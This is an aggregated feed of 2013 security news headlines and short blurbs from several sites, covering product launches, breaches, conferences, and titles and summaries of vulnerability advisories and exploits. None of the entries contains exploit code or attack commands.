http://www.darkreading.com/rss/all.xml HP this week released new big data tools designed to provide businesses with better information security intelligence gathering capabilities, and launched a new information security research group that's been tasked with providing better threat intelligence for HP's own security products. On the big data front, HP said users of HP ArcSight's security information and event management (SIEM) can now integrate the software with the HP Autonomy IDOL content analytics engine. According to HP, "this combination automatically recognizes the context, concepts, sentiments and usage patterns related to how users interact with all forms of data," and gives businesses a new way to translate raw security data into more actionable intelligence by helping security managers better track individual users' behavior patterns and spot signs of unusual activity. To help businesses monitor more security events at once, HP also released a new HP ArcSight/Hadoop Integration Utility, which integrates HP ArcSight ESM 6.0c with Apache Hadoop, the open source data processing platform that's been driving the push toward big data. According to HP, the combination of Hadoop's large-scale data repository and ArcSight's reporting, search and correlation capabilities can be used to apply "statistical analysis, anomaly detection and predictive analytics" for security events contained in petabytes of captured data.

==> Segmentation Can Increase Risks If Firewalls Aren't Managed Well

http://www.darkreading.com/rss/all.xml The multiplication of internal firewalls to comply with regulations and minimize risk to critical databases and applications has created a rat's nest of firewall configuration issues

==> BlackBerry 10 with Enhanced Security Wins Hefty Order from Germany

http://www.eweek.com/rss-feeds-45.xml The German government plans to buy as many as 40,000 BlackBerry 10 devices that will be enhanced with security applications from SecuSmart to meet NATO standards.

==> BYOD, Virtualization Impact Enterprise Security: F5 Networks

http://www.eweek.com/rss-feeds-45.xml The security landscape continues to change rapidly and many organizations are struggling to properly address evolving threats, the survey indicated.

==> Evernote Cloud Storage Service Warns Users of Password Breach

http://www.eweek.com/rss-feeds-45.xml Unknown attackers gain access to user data and encrypted password files, prompting the online storage service to alert its subscribers of the breach.

==> Businesses Concerned About State-Sponsored Cyber Attacks

http://www.eweek.com/rss-feeds-45.xml In the wake of high-profile cyber attacks directed against U.S. companies, a survey finds half of businesses believe their organization could be a target.

==> SCADA Security Experts Call for More Public-Private Collaboration

http://www.eweek.com/rss-feeds-45.xml To tackle threats to critical infrastructure control systems, companies, academia and government need to work together and exchange information, experts say at the RSA Conference.

==> Google Offers Reminders on Preventing Identity Theft

http://www.eweek.com/rss-feeds-45.xml Identity theft is again the top consumer complaint in the U.S, according to the FTC. Google wants to remind users how they can avoid becoming victims.

==> Reanimating Botnet Domains Delivers Clues to Cold Cases

http://www.eweek.com/rss-feeds-45.xml Grabbing forgotten domains allows researchers to identify victims and gain more intelligence about botnets and nation-state espionage attacks.

==> Stuxnet Variant Origins May Stretch Back to 2005, Symantec Says

http://www.eweek.com/rss-feeds-45.xml The notorious malware at the center of the cyber-sabotage campaign that targeted Iran's nuclear program is several years older than researchers once thought.

==> McAfee Will Add Malware Sandboxing to Its Securityware

http://www.eweek.com/rss-feeds-45.xml This identifies malware, isolates it, runs it in the protected sandbox, then deletes, quarantines or holds it for further action.

==> Box Adds New Security Layer for Life Cycle of Content

http://www.eweek.com/rss-feeds-45.xml Box's new functionality better enables enterprises to manage users, devices and applications while also providing on-demand access to data analytics.

==> Juniper Launches Cloud-Based Security Intelligence Service

http://www.eweek.com/rss-feeds-45.xml Juniper's Junos Spotlight Secure service will give businesses greater insight into attackers, threats and the devices used in attacks.

==> RSA Conference: Embrace Big Data Analytics for Security, Coviello Says

http://www.eweek.com/rss-feeds-45.xml Art Coviello, executive chairman of EMC's RSA security division, says big data analytics will push organizations toward intelligence-driven security.

==> RSA: Why Big Data Presents Big Security Problems

http://www.eweek.com/rss-feeds-45.xml The security giant launches a new version of Authentication Manager; Chairman Art Coviello details threats and the opportunities that big data presents.

==> Security Worker Shortfall is Putting Organizations at Risk

http://www.eweek.com/rss-feeds-45.xml Both government agencies and the private sector need more security people. The current scarcity puts the United States at risk, say experts.

==> IT Security Organizations Facing Shortage of Skilled Professionals

http://www.eweek.com/rss-feeds-45.xml Organizations are looking for a variety of skills in job candidates, and there's an acute shortage of secure application development specialists.

==> [webapps] - Remote File Manager v1.2 iOS - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php Remote File Manager v1.2 iOS - Multiple Vulnerabilities

==> [dos] - Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

http://www.exploit-db.com/rss.php Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

==> [local] - Viscosity setuid-set ViscosityHelper Privilege Escalation

http://www.exploit-db.com/rss.php Viscosity setuid-set ViscosityHelper Privilege Escalation

==> [local] - Setuid Tunnelblick Privilege Escalation

http://www.exploit-db.com/rss.php Setuid Tunnelblick Privilege Escalation

==> [webapps] - D-Link DSL-2740B (ADSL Router) Authentication Bypass

http://www.exploit-db.com/rss.php D-Link DSL-2740B (ADSL Router) Authentication Bypass

==> [webapps] - PHP-Fusion 7.02.05 - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php PHP-Fusion 7.02.05 - Multiple Vulnerabilities

==> [webapps] - Piwigo 2.4.6 - Multiple Vulnerabilities

http://www.exploit-db.com/rss.php Piwigo 2.4.6 - Multiple Vulnerabilities

==> [webapps] - doorGets CMS - CSRF Vulnerability

http://www.exploit-db.com/rss.php doorGets CMS - CSRF Vulnerability

==> [papers] - Post XSS Exploitation: Advanced Attacks and Remedies

http://www.exploit-db.com/rss.php Post XSS Exploitation: Advanced Attacks and Remedies

==> [papers] - [Hebrew] Digital Whisper Security Magazine #40

http://www.exploit-db.com/rss.php [Hebrew] Digital Whisper Security Magazine #40

==> Check Point Reinvents Security and Compliance Monitoring

http://www.globalsecuritymag.com/spip.php?page=backend Check Point has introduced the new Check Point Compliance Software Blade, an integrated real-time compliance monitoring solution that leverages an extensive knowledge of regulatory requirements and IT security best practices. The Compliance Software Blade ensures that security policies are aligned with global regulations and validates that appropriate security levels are maintained - shortening audit times, improving security and reducing costs for businesses. The new solution is fully (...) - Product Reviews

==> Ipswitch File Transfer announces WS_FTP Server 7.6

http://www.globalsecuritymag.com/spip.php?page=backend Ipswitch File Transfer has announced the availability of its latest secure file transfer software, WS_FTP Server 7.6. The new software includes enhanced security, expanded database support and new customisation tools for simplified and secure person-to-person file transfers. New features of WS_FTP 7.6 include: Enhanced Security: WS_FTP Server 7.6 builds upon its extensive security capabilities with the ability to encrypt file transfers using the OpenSSL 1.0.1c protocol. (...) - Product Reviews

==> NaviSite Introduces NaviCloud® Intelligent Storage Vault for Enterprises

http://www.globalsecuritymag.com/spip.php?page=backend NaviSite, Inc., a Time Warner Cable Company, is a provider of enterprise-class hosting, managed application, managed messaging and managed cloud services, today announced a new backup service for enterprises as part of the NaviCloud Intelligent Storage (NCIS) suite of solutions. NCIS Vault provides companies with an advanced, on premise, data protection and storage capability with data replication to the NaviCloud platform. In a recent IDC Analyst Connection report, "Reduce Storage (...) - Product Reviews

==> Vigil@nce - TYPO3: vulnerabilities of extensions

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can use several vulnerabilities of TYPO3 extensions in order to generate a Cross Site Scripting or to inject code. Impacted products: TYPO3 Severity: 2/4 Creation date: 19/02/2013 DESCRIPTION OF THE VULNERABILITY Several vulnerabilities were announced in TYPO3 extensions. An attacker can trigger an SQL injection in the CoolURI (cooluri) extension. (...) - Security Vulnerability

==> Christian Toon, Iron Mountain: Are data breaches inevitable in a digital age?

http://www.globalsecuritymag.com/spip.php?page=backend With 93 per cent of large and 76 per cent of small organisations admitting to falling foul of a security breach in the past two years, you would be forgiven for thinking that some form of data loss within business is inevitable. Indeed Iron Mountain research found that more than half (53.3 per cent) of European businesses expect to lose data. As a result, they are unprepared when it comes to protecting company information. This complacency is cause for concern. Many businesses are (...) - Opinion

==> IBM To Make Its Cloud Services and Software Open Sourced-based

http://www.globalsecuritymag.com/spip.php?page=backend IBM announced that all of its cloud services and software will be based on an open cloud architecture. This move will ensure that innovation in cloud computing is not hampered by locking businesses into proprietary islands of insecure and difficult-to-manage offerings. Without industry-wide open standards for cloud computing, businesses will not be able to fully take advantage of the opportunities associated with interconnected data, such as mobile computing and business analytics. As the (...) - Product Reviews

==> NextiraOne UK invests €1M in ‘Smart-Tasking' Managed Services

http://www.globalsecuritymag.com/spip.php?page=backend NextiraOne UK is investing 1m in its Managed Services business to strengthen its team, dramatically enhance its Managed Services solution portfolio and focus on increasingly effective service delivery that will add genuine business value for the company's customers. The investment will build on NextiraOne's highly successful Managed Services business development over the last few years and includes the recruitment of new experts and dedicated managed services consultancy expertise, plus (...) - Business News

==> UL becomes a fully appointed Common Criteria Information Technology Security Evaluation Facility (ITSEF), under the UK Scheme run by CESG

http://www.globalsecuritymag.com/spip.php?page=backend UL is pleased to announce that their UK-based laboratory has successfully completed the process to achieve Common Criteria accreditation to ISO/IEC 17025 by the UK Accreditation Service (UKAS) and full ITSEF appointment under the UK IT Security Evaluation and Certification Scheme operated by CESG. This accreditation and appointment means that UL can now undertake security evaluation to the highest level of vulnerability analysis (AVA_VAN.5). This helps their customers globally with (...) - Business News

==> SMARTRAC Launches WebLite UHF RFID Tag for Retail EPC Programs

http://www.globalsecuritymag.com/spip.php?page=backend SMARTRAC N.V., the developer, manufacturer, and supplier of RFID transponders and inlays, announced the introduction of its new UHF EPC compliant WebLite inlay. The SMARTRAC WebLite inlay represents a technological advance in both size and performance. With an antenna size of only 46 x 15 mm (1.8 x 0.6), it is especially suited for item-level tagging and identification where RFID tag space is limited and performance is of critical importance. Due to its compact form and special design, (...) - Product Reviews

==> Chen Lifang: Huawei Committed to Open IPR Licensing System and to Enhancing Europe's Role as a Global Innovation Leader

http://www.globalsecuritymag.com/spip.php?page=backend Huawei respects and protects intellectual property rights (IPR) and is committed to an open IPR licensing system, said Chen Lifang, Huawei Board Member and Senior Vice President, today in her speech at the EU Science: Global Challenges, Global Collaboration (ES:GC2) conference in Brussels. The IP that Huawei develops and acquires as a result of our participation in European scientific research initiatives will first be applied in Europe in order to help improve Europe's global leadership in (...) - Opinion / affiche

==> Tyco identifies key security trends that will shape the industry in 2013 and beyond

http://www.globalsecuritymag.com/spip.php?page=backend Tyco Integrated Fire and Security, a Tyco company which designs, installs and services fire and electronic security systems for commercial, industrial, residential and government customers, has drawn on its experience and reach in the market to identify the key security trends that will influence the industry in Europe in the coming years. Global macroeconomic trends such as urbanisation, an increasingly globalised workforce, rising cybercrime, the threat of terrorism and economic (...) - Special Reports

==> Datum partners with Vtesse for high bandwidth datacentre connectivity services

http://www.globalsecuritymag.com/spip.php?page=backend Datum, the Business-Class datacentre provider, announces its partnership with Vtesse, the leading UK business communications provider, to deliver high bandwidth connectivity into its newly built datacentre, located in the highly secure QinetiQ Cody Technology Park, in Farnborough. Vtesse has implemented diverse fibre routes into the site to provide Datum clients with fully resilient, high bandwidth connectivity and IP Transit service. The solution provides connectivity into Vtesse's robust, (...) - Business News

==> Vigil@nce - MIMEsweeper for SMTP: Cross Site Scripting via authentication

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can trigger a Cross Site Scripting in MIMEsweeper for SMTP, in order to execute JavaScript code in the context of the web site. Impacted products: MIMEsweeper Severity: 2/4 Creation date: 19/02/2013 DESCRIPTION OF THE VULNERABILITY The PMM (Personal Message Manager) component of MIMEsweeper for SMTP allows users to manage their spam emails. An (...) - Security Vulnerability

==> Vigil@nce - nss-pam-ldapd: memory corruption via FD_SET

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can open several files with an application using nss-pam-ldapd, in order to stop the service, and possibly to execute code. Impacted products: Debian, Fedora, RHEL, Unix (platform) Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY The nss-pam-ldapd module processes the LDAP authentication. The select() system call monitors events (...) - Security Vulnerability

==> Vigil@nce - Cisco Secure ACS, Prime: privilege elevation

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An authenticated attacker can use a vulnerability of the CLI (command-line interface), in order to execute a shell command with root privileges. Impacted products: Cisco Prime, Secure ACS Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY An authenticated attacker can use a vulnerability of the CLI (command-line interface), in order to execute a (...) - Security Vulnerability

==> Vigil@nce - Cisco Unity Connection: denial of service via TCP

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can open several TCP sessions on Cisco Unity Connection, in order to deplete memory resources, to progressively create a denial of service. Impacted products: Cisco Unity Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY An attacker can open several TCP sessions on Cisco Unity Connection, in order to deplete memory resources, to (...) - Security Vulnerability

==> Vision-Box® unveils a new biometric periscope at AVSEC

http://www.globalsecuritymag.com/spip.php?page=backend Vision-Box S.A. introduced today its new biometric periscope, for simultaneous capture of face and iris, at a distance. Vision-Box S.A. unveiled, during AVSEC 2013, a new biometric periscope, which upon detecting the user, automatically adjusts height and illumination to allow simultaneous, full-frontal ICAO compliant iris & face capture and matching. The self-service process takes place in a very organic and intuitive way. The user can keep walking and is not required to make any (...) - Product Reviews

==> Matrix and Voxbone complete Interoperability test for Voice Services

http://www.globalsecuritymag.com/spip.php?page=backend Matrix Comsec, manufacturer of IP-PBXs and VoIP-GSM Gateways announced the successful completion of interoperability testing with Voxbone, a market in providing worldwide geographical, toll-free and iNum telephone numbers. Matrix's IP Phone Systems, VoIP Gateways and Adaptors are ideal IP telephony solutions for SMB users that wish to compete and grow their businesses over time. SIP trunking has been offering dramatic reduction in cost over traditional digital telephony services. This (...) - Business News

==> Cassidian CyberSecurity and Netasq launch a new Approach to combat APT

http://www.globalsecuritymag.com/spip.php?page=backend Cassidian CyberSecurity and Netasq launch a new 7 Step Approach to combat cyber attacks in the Middle East. As organizations need a trusted partner with the expertise to manage and execute a comprehensive response plan, Cassidian CyberSecurity has developed a 7 Step Approach, combining expertise, processes and tools, which have never been used before, to successfully combat APTs raising awareness, initial check, deeper analysis, cleaning, reconnection, recovery and remote supervision. (...) - Product Reviews

==> Vigil@nce - Linux kernel: privilege elevation via PTRACE_SETREGS

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can create a program using ptrace(), in order to alter the execution procedure, to elevate his privileges. Impacted products: Debian, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY The systrace() system call tracks and controls the execution of a process. The PTRACE_GETREGS and (...) - Security Vulnerability

==> IGEL Thin Clients Embed DigitalPersona Fingerprint Recognition Technology to Secure and Speed Access to Virtual Desktops

http://www.globalsecuritymag.com/spip.php?page=backend IGEL Technology, one of the world's leading manufacturers of thin clients, and DigitalPersona, Inc., a trusted partner for biometric identity verification solutions,announced they have integrated their technologies to allow the use of fingerprint biometrics as an authentication credential to virtual applications hosted on a Citrix XenApp server. IGEL Linux now supports the management of users' credentials on Citrix XenApp servers with DigitalPersona Pro Enterprise v5.3 and v5.4 (...) - Product Reviews

==> Data CloseGap - smart virus protection technology

http://www.globalsecuritymag.com/spip.php?page=backend After several years of development, G Data will introduce its new antivirus technology "Made in Germany" as a world premiere at CeBIT 2013: G Data CloseGap Active Hybrid Protection that fends off malware and online attacks. G Data CloseGap is more than just AV technology and breaks new ground technologically. It supplements proactive defence technologies like BankGuard, WebCloud and BehaviourBlocker with signature-based detection and protection technologies. Thanks to its modular structure (...) - Product Reviews

==> Airlines to overtake energy companies in targeting mobile consumers Annual spend to reach $37 million per company by 2015

http://www.globalsecuritymag.com/spip.php?page=backend Energy, telecommunications and airline firms are taking the lead in spending to engage consumers through their mobile devices, according to The New Digital Mobile Consumer global trend report. Commissioned by Tata Consultancy Services (TCS) the research reveals that average expenditure within the companies surveyed in these sectors during 2012 was between $27 million to $31 million per company. During 2012, energy companies spent an average of $30.8 million per company in targeting mobile (...) - Special Reports

==> VASCO launches DIGIPASS 870 with "what you see is what you sign" functionality

http://www.globalsecuritymag.com/spip.php?page=backend In connected mode DIGIPASS 870 can be used for a number of PKI-based, e-banking or e-wallet applications making use of the what you see is what you sign' functionality. Important transaction data such as amount, account and reference number will be displayed on the device and must be confirmed by the user by entering a PIN code and approving the transaction. This WYSIWYS functionality enables users to actually see which transaction they are signing. The e-signature functionality provides (...) - Product Reviews

==> 7-8 March: APWG Unites Cybercrime Fighters from Research and Law Enforcement Sectors in Dublin

http://www.globalsecuritymag.com/spip.php?page=backend The third annual APWG eCrime Researchers Sync-Up will be held here March 7th and 8th, 2013, gathering cybercrime fighters from around the world. This is a two-day exchange of presentations and discussions related to eCrime research in progress - and for networking of researchers and cybercrime law enforcement officers within the disciplines that are defining the eCrime forensic field today. The Sync-Up, begun three years ago in collaboration with University College Dublin (UCD) as a (...) - EVENTS

==> Websense TRITON Trumps All Vendors Within Independent Security Effectiveness Test

http://www.globalsecuritymag.com/spip.php?page=backend Miercom, the well-respected worldwide testing service, recently conducted one of the largest independent tests of real-world threat protection capabilities of web security systems. Results show that Websense, Inc. demonstrated superior security effectiveness, threat detection and mitigation capabilities over the other tested systems. The test pitted Websense TRITON Web Security Gateway Anywhere, powered by the Websense Advanced Classification Engine (ACE), against web security systems (...) - MAGIC QUADRANT

==> Cassidian CyberSecurity awarded consultancy contract by Oil and Gas company in the Middle East

http://www.globalsecuritymag.com/spip.php?page=backend Cassidian CyberSecurity has been awarded a consultancy contract by a major Oil and Gas company in the Middle East. The contract consists of establishing governance of the company's IT security of Industrial Control Systems (ICS), also called SCADA (Supervisory Control And Data Acquisition). The objective is to define the accountability of SCADA security within the company and the roles and responsibilities of the various stakeholders, mainly from IT and Automation departments. The (...) - Market News

==> CeBIT 2013 (5–9 March, Tue.–Sat.) “Shareconomy” is keynote theme for CeBIT 2013

http://www.globalsecuritymag.com/spip.php?page=backend After Cloud Technology in 2011 and Managing Trust in 2012, Shareconomy is the keynote theme for CeBIT 2013. Cloud-based applications are clearly on the rise, and have now earned user trust. As the world's most important event for the digital economy, CeBIT will spotlight this sweeping trend that emphasizes sharing knowledge, resources and experience to create new forms of collaboration, said Frank Prschmann, Member of the Managing Board at Deutsche Messe. New information and communications (...) - EVENTS

==> NoSuchCon conference : Call for Paper

http://www.globalsecuritymag.com/spip.php?page=backend The first edition of the NoSuchCon conference will take place in Paris from the 15 to the 17 May of 2013. NSC is the badass bleep technical security conference. Of death. NoSuchCon (NSC) is a fork (think continuation) from the Hackito Ergo Sum conference. When you participate to some given open source software, if you submit patches, and if the project owner doesn't accept your contribution, you could fork from it. Long story short : that's exactly what happened inside the Hackito (...) - EVENTS

==> Wick Hill To Distribute Becrypt Data Security Solutions

http://www.globalsecuritymag.com/spip.php?page=backend VAD Wick Hill is to become a UK distributor for leading cyber security solutions vendor Becrypt. Becrypt provides enterprise security and endpoint security solutions for desktops, laptops, tablets, USB sticks, mobile devices and removable media devices. Ian Kilpatrick, chairman Wick Hill Group, commented: Becrypt is a valuable addition to our portfolio and has a lot to offer our channel partners. It is one of the major players in the field, providing market-leading solutions, and is (...) - Business News

==> Vigil@nce - Linux kernel: denial of service via USB io_ti

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can unplug a USB-Serial converter, whereas it is still used, in order to dereference a NULL pointer, which stops the kernel. Impacted products: Linux Severity: 1/4 Creation date: 27/02/2013 DESCRIPTION OF THE VULNERABILITY The drivers/usb/serial/io_ti.c file implements the module to manage Edgeport converters for Serial port, which are connected on (...) - Security Vulnerability

==> Vigil@nce - NetBSD: denial of service via kqueue

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can use the kqueue() and kevent() functions on a malicious file descriptor, in order to stop the system. Impacted products: NetBSD Severity: 1/4 Creation date: 27/02/2013 DESCRIPTION OF THE VULNERABILITY The kqueue() system call requests the kernel to inform the process when some events occur. The kevent() function is used to alter the list of events (...) - Security Vulnerability

==> Be Part of Asia's Largest ICT Trade Fair & Exhibitions this March 2013!

http://www.globalsecuritymag.com/spip.php?page=backend With vast experience in organizing and managing ICT based industry events, JFPS Group has recently launched four more technology focused trade fairs and exhibitions scheduled on 20 21 March 2013, at Putra World Trade Centre, Kuala Lumpur, Malaysia. Spanning over 7000 sqm of exhibition space, Mobile & Wireless Technology 2013 (www.mobilewirelesstech.com), Digital Marketing & Advertising Showcase 2013 (www.madverts.asia), 2nd Annual Infosecurity World Exhibition & Conference (...) - EVENTS

==> Vigil@nce - Symantec PGP, Encryption Desktop: privilege elevation

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can use two vulnerabilities of Symantec PGP/Encryption Desktop, in order to execute code with system privileges. Impacted products: Symantec Encryption Desktop, PGP Desktop Severity: 2/4 Creation date: 15/02/2013 DESCRIPTION OF THE VULNERABILITY The Symantec PGP/Encryption Desktop product installs the pgpwded.sys driver. However, it is impacted by (...) - Security Vulnerability

==> 20-21 March 2013, PWTC Kuala Lumpur Malaysia

http://www.globalsecuritymag.com/spip.php?page=backend Mobile & Wireless Technology 2013 Connected devices have become a global phenomenon and the trend is expected to be ever last. The total number of connected devices increases by more than 150 percent throughout the decade with over 11 billion of total connected devices and revenue opportunity for mobile and wireless operators for this space by 2020 is approximately US$1.2 trillion. Whilst the relatively mature markets of Europe and North America continuously fight for the market (...) - EVENTS

==> Secutech announces the date for its 2013 show

http://www.globalsecuritymag.com/spip.php?page=backend Secutech 2013, the business platform for global security players, will be held from 24 26 April 2013 at the Taipei Nangang Exhibition Center in Taiwan. Organised by Messe Frankfurt New Era Business Media Ltd, the 16th edition of the show is a business platform for global security professionals to find new business opportunities as well as enhance their brand reputation. The 2013 show is expected to attract 560 exhibitors and welcome more than 26,000 professional visitors, especially from (...) - EVENTS

==> 19 March - 29 My: DenyAll's upcoming Webinars cover the following key themes: BYOD, migration, virtual patching and

http://www.globalsecuritymag.com/spip.php?page=backend March 19: Beyond BYOD, featuring Promon's CTO and founder, Tom Lysemose. _ The webinar will focus on how to ensure that corporate data remains secure while being accessed by devices that don't comply with corporate policy. The innovative Client Shield solution for Web and mobile applications will be presented. March 26: why and how to migrate to DenyAll Protect version 4.1? This webinar will highlight the advantages of the new platform and present the methodology used by DenyAll to support (...) - EVENTS

==> Landing Proxify

http://www.gnucitizen.org/feed/ I am really happy to announce the first release of proxify. I started writing this tool several years ago but I was never able to finished it. The first release (version 1.0) is now available for download on all platforms: Linux, Mac and Windows. What is Proxify The idea behind Proxify is to create a proxy that is just good at doing proxying. It is the proxy of all proxies so-to-say. [...]

==> Fuzzing XML and JSON Pt.1

http://www.gnucitizen.org/feed/ It is hard to get back to blogging especially when there are easier alternatives to scratch your itch – I am talking about twitter. However, I decided to make the effort and see where it takes me. It will be difficult initially but practice leads to continuous improvement. What I would like to do is to highlight some of the work I did to take two relatively simple and straightforward penetration testing practices to the next level: this is XML and JSON fuzzing. [...]

==> You and Your Research

http://www.gnucitizen.org/feed/ This is really one of my favourite talks from this year’s HITB in KL. @haroonmeer did an exceptional job at describing what it takes to produce an exceptional piece of work/research and the various pitfalls and sacrifices one needs to make.---recent posts from the gnucitizen network:How To Improve Your Browser Security With PanicModeBadAssProxy and Websecurify SuiteLanding a BadAssProxyLNUG (London Node User Group)Landing Proxify

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic about Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Wether this is the real deal or simply fear mongering, I simply don’t know. It is all speculations at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Chirstian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ bellow is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated Web Application Security Testing tools are in the core of modern penetration testing practices. You cannot rely 100% on the results they produce, without considering seriously their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetrating testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

http://www.gnucitizen.org/feed/ I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me, that’s hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. [...]

==> Cyber-war: Time for Malaysian agencies to step up

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Malaysia LAST month, US President Barack Obama issued an executive order to bolster his nations cyber-defenses, a move unpopular with some hacker movements and civil society advocates, eagerly awaited by many, and considered insufficient by some experts. Tags: MalaysiaHackersSecurityGOV

==> Pirate Bay to world: We're not really off to North Korea

